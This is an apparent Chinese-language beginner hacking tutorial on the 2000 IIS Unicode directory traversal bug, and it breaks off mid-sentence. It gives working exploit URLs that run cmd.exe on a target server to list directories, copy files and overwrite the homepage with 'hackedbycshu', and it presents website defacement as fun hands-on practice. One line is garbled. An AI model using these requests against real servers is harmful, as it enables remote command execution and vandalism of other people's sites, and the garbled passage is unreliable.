黑客初级技术讲解（下续二）

基础知识（2）

今天我们谈谈unicode漏洞，这可是基础中的基础，重点里的重点，不懂的一定要好好学。

2000年10月17日中联绿盟发布了以下的安全公告：

微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

远程漏洞：是

本地漏洞：是

发布日期：2000年10月17日

更新日期：2000年10月17日

受影响的版本：

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

这可是中国乃至全球网络安全界的一次大变节，入侵nt/2000系统变得如此简单，不打补丁的死路一条。

下面开始正式学习：

一，UNICODE漏洞的原理

此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1， 中国台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中，UNICODE编码 存在BUG，在UNICODE 编码中

%c1%1c -〉 （0xc1 - 0xc0） * 0x40 + 0x1c = 0x5c = ’/’

%c0%2f -〉 （0xc0 - 0xc0） * 0x40 + 0x2f = 0x2f = ’\’

在NT4中/编码为%c1%9c

在英文版里： WIN2000英文版%c0%af

在中文win2k里：%c1%1c

此外还有多种编码，不一一阐述。

本文例子均以win2k为准，其他类型请自行替换。

基础知识（3）

二，一切从基础开始

由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：（假设11.11.22.22有漏洞）

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

如果成功，那么在浏览区可看到如下信息：

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）

是不是有自己机器的感觉了，正点！就是这种感觉！

cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！

http://11.11.22.22/msadc/..%c1%1 ... em32/cmd.exe?/c+dir （这个命令同样道理）

大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

会dos的朋友一定懂其意义了，不懂的请去看书 .

不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

三，实战演练

1，修改主页！（是不是很爽？）

一般主页位置在c:\inetpub\wwwroot下，但要是改了路径，就需要找找了。

最方便的方法：在浏览器里输入 http://11.11.22.22/.ida要是有漏洞，那在浏?..皇俏颐堑氖籽　?/a>

分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

dir/s法：首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？iloveu.gif，然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。

找到了目录，就要对它开刀了！一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm

那么我们就修改它吧！

最方便的方法：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

回应为：HTTP 500 - 内部服务器错误

通过对cmd的分析，袁哥得出一条简便的方法，加入符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

回应为：cgi错误，不用理会

两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？不错吧

而在实际操作中，可能袁哥的方法也会失效，这时，我们就可以copy cmd.exe 为另一个exe，记住路径，用copy后的来echo

例如：11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上传法：echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，那就应该用改好的主页